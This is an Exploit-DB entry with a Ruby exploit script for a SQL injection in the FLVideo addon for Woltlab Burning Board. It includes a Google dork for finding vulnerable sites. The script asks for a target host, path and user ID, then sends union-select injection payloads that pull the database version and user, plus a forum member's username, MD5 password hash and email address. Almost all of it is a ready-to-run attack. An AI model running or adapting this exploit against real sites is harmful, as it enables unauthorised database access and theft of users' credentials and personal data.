Woltlab Burning Board FLVideo Addon - 'video.php?value' SQL Injection

EDB-ID:

28126

CVE:





Platform:

PHP

Date:

2013-09-06


# Exploit Title: Woltlab Burning Board FLVideo Addon SQL Injection flvideo.php Exploit
# Google Dork: inurl:flvideo.php wbb (and more)
# Date: 04.09.2013
# Exploit Author: Easy Laster
# Vendor Homepage: http://www.flvideo.de/
# Version: FLVideo Addon for WBB © 2007 by Danny König 
# Tested on: Windows8/Backtrack

#!/usr/bin/ruby
#secunet.cc
#19.02.2013
#Discovered and Vulnerability by Easy Laster
#flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*
#*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(version()%20as%20char))
#null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/
#**/+userid=1--+
print "
################################################################
#                            secunet.cc                        #
################################################################
#PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
#Woltlab Burning Board FLVideo Addon SQL Injection flvideo.php #
#                          Exploit                             #
#                     Using Host+Path+id                       #
#              www.demo.de + /wbb/ + or + / + 1                #
#                         Easy Laster                          #
#PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
################################################################
"
require 'net/http'
block = "################################################################"
print ""+ block +""
print "\nEnter Target Name (site.com)->"
host=gets.chomp
print ""+ block +""
print "\nEnter Script Path (/wbb/ or /)->"
path=gets.chomp
print ""+ block +""
print "\nEnter The ID From User (id)->"
userid=gets.chomp
print ""+ block +""
begin
dir =  "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
       "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(version()%20as%20char))"+
       "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
       "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
       "**/+userid="+ userid +"--+"
       http = Net::HTTP.new(host, 80)
       resp= http.get(path+dir)
       print "\nVersion Database -> "+(/'~'(.+)'~'/).match(resp.body)[1]

          dir =  "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
          "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(user()%20as%20char))"+
          "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
          "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
          "**/+userid="+ userid +"--+"
          http = Net::HTTP.new(host, 80)
          resp= http.get(path+dir)
          print "\nDatabase User  -> "+(/'~'(.+)'~'/).match(resp.body)[1]

             dir =  "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
             "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(userid%20as%20char))"+
             "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
             "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
             "**/+userid="+ userid +"--+"
             http = Net::HTTP.new(host, 80)
             resp= http.get(path+dir)
             print "\nID Account  -> "+(/'~'(.+)'~'/).match(resp.body)[1]

         dir =  "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
         "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(username%20as%20char))"+
         "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
         "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
         "**/+userid="+ userid +"--+"
         http = Net::HTTP.new(host, 80)
         resp= http.get(path+dir)
         print "\nUsername Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]

      dir =  "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
      "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(password%20as%20char))"+
      "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
      "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
      "**/+userid="+ userid +"--+"
      http = Net::HTTP.new(host, 80)
      resp= http.get(path+dir)
      print "\nPassword Account MD5 -> "+(/'~'(.+)'~'/).match(resp.body)[1]

   dir =  "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
   "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(email%20as%20char))"+
   "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
   "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
   "**/+userid="+ userid +"--+"
   http = Net::HTTP.new(host, 80)
   resp= http.get(path+dir)
   print "\nEmail Adresse Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]
    print "\n"     
  print ""+ block +""
   print "\n"
 print "
################################################################
#                            Greetings                         #
################################################################
#mAdDiN, c0Re, illuministrator, WD40, peak, IRET, GabbaGandalf #
#DR.zydz, HANN!BAL, 6rbk9 , Manifest, doc, cr4ck, Prof.Dr. Ogen#
#ezah, enco, 4c!d And SecuNet.cc, 4004, dc3 crew, hackbase.cc  #
################################################################
   "
   rescue
  print "\nExploit Failed"
end